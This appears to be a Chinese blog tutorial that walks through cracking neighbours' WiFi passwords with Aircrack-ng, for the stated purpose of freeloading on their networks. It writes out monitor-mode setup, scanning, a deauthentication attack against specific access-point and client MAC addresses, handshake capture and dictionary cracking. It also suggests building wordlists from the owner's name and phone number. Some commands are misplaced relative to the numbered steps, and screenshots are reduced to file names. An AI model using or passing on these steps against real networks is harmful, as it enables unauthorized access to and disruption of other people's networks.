service network-manager stop
在当今高速网络至关重要的时代,能够随时随地连接到WiFi变得非常重要。然而,我发现附近有这么多无线WiFi,不蹭真是不开心。虽然现在有一些高度集成的WiFi破解工具,但是今天我要介绍的这款工具还需要一些工作。废话不多,直接上教程。
1、确认您的无线网卡是否支持。具体可以参考Aircrack的兼容性列表,这里我就不多说了。
2、下载Aircrack并进行安装。您可以在官网上找到Windows版和Linux版的程序。我使用的是Linux版,使用Windows版可以参考其他教程,不过应该也差不多。我是在Kali自带的环境中安装的,没有手动安装,就不展示了。
3、开始教程。
1)关闭网络。
airmon-ng check kill
iwconfig
airmon-ng start wlan0
airodump-ng prism0
2)结束可能会影响结果的进程。
3)查看网卡列表。
s3.png
4)启动网卡进入监听模式。
选择适合您的无线网卡,wlan0请根据本地的iwconfig显示信息进行更改。
s4.png
5)监听周围所有无线网络信息。
prism0请根据上图进行更改,因为附近的WiFi比较多,所以我切换了显示界面。
s51.png
s52.png
6)监听感兴趣的无线网络。
根据上一步的结果执行以下命令:
说明两点:一、-c后面跟的是该行CH的值。二、-w后面跟的是保存的文件名,可以任意取。
aireplay-ng -0 2 -a 14:75:90:C0:5E:68 -c CC:A2:23:A3:7D:4D prism0
7)加快获取握手包的速度。
保持上一步中的窗口不关闭,新开一个窗口,执行以下命令:
这一条我一般是每1-2分钟执行一次,执行20-30次还没有结果我就会放弃这个WiFi,换一个破解(毕竟周围的网络比较多,破解几个就行了)。当然也没有明确的规定,执行的频率。
airmon-ng stop prism0
service network-manager start
aircrack tmp-01.cap -w pass.txt
一直等到第6步的窗口中有WPA握手包后才可以停止第6步。
s7.png
8)关闭监听接口。
9)启动网络。
10)破解密码。
这是一个靠运气和耐心的工作。首先要有一个比较好的WiFi字典,如果没有就去下载一个。或者如果您知道一些敏感的信息,比如WiFi主人的名字、电话等等,可以去下载一个密码生成器,搜索一下,有一大堆,我就不推荐了。
我得到的握手包是tmp.cap,密码字典是pass.txt: